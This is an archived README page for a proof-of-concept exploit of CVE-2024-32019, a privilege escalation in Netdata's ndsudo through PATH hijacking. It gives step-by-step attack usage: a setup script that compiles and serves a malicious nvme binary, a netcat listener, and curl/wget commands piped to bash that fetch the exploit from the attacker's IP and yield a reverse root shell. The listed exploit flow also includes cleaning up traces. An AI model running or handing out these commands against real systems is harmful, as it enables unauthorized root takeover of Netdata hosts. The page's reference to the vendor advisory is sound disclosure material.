关联漏洞
描述
Privilege Escalation via "ndsudo" (Netdata Local Exploit)
介绍
# CVE-2024-32019-PoC
Bash script for Privilege Escalation via "ndsudo" (Netdata Local Exploit)
## Netdata Affected Versions
* \>= v1.45.0, < v1.45.3
* \>= v1.44.0-60, < v1.45.0-169
## Vulnerability Description
The "ndsudo" tool runs a restricted set of external commands, but the search paths are supplied by the "PATH" environment variables.
By changing the "PATH" environment variable to a path we have access to, we can control where ndsudo look for the commands and create one that contain malicious code.
## Proof Of Concept
This exploit is based on the assumption that the target machine and the attacker machine are on the same network.
### Prerequisites
#### Attacker Machine
* Listener on port 4444
* Web server hosting the malicious nvme binary
#### Target Machine:
* Local shell access
* Permission to execute ndsudo
* wget/curl/any HTTP client for payload download
### Usage
#### On Attacker Machine
We can automatically generate and deploy the file needed for the attack by running the "setup_exploit_server.sh"
```bash
$ ./setup_exploit_server.sh YOUR_IP
--------- Exploit Infrastructure Setup by Ottanta ---------
[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444
Press Enter to stop the web server and clean up...
```
This script will create all the file needed for the attack configured with your ip address.
After deploying our web server we start a listener on another shell:
```bash
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...
```
#### On Target Machine
Depending on our http client we can download and execute our exploit .
```bash
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
```
If everything was done correctly we should now have a root shell.
### Exploit Flow
1. Downloads malicious binary to /tmp/exploit/
2. Modifies PATH to prioritize controlled directory
3. Executes ndsudo nvme-list which runs malicious binary
4. Establishes reverse shell to attacker machine
5. Cleans up traces
## Reference
* https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
* https://nvd.nist.gov/vuln/detail/CVE-2024-32019
## Legal Disclaimer
This proof-of-concept is for educational and authorized testing purposes only.
Unauthorized use against systems you do not own or have explicit permission to test is illegal.
The authors are not responsible for any misuse of this information.
文件快照
[4.0K] /data/pocs/e713b2bf2d78228feaf23f31270b7f314538275b
├── [ 302] example_nvme.c
├── [1.0K] ndsudo_pe.sh
├── [2.9K] README.md
└── [2.9K] setup_exploit_server.sh
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。